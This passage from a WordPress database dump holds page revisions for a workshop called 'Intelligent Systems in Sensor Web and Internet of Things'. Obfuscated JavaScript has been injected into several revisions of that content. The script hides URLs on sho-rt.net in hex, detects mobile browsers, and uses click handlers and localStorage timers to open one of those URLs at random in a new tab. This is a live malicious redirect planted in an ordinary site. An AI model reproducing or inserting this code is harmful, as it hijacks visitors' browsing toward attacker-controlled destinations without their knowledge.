_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:09:42','2022-12-06 05:09:42','',3386,'https://gsw2023.com/?p=3404',0,'revision','',0),
(3405,1,'2022-12-06 05:10:21','2022-12-06 05:10:21','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" type=\"masonry\" resized_image_dimensions=\"12x30\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:10:21','2022-12-06 05:10:21','',3386,'https://gsw2023.com/?p=3405',0,'revision','',0),
(3406,1,'2022-12-06 05:10:39','2022-12-06 05:10:39','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" type=\"masonry\" resized_image_dimensions=\"12x20\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 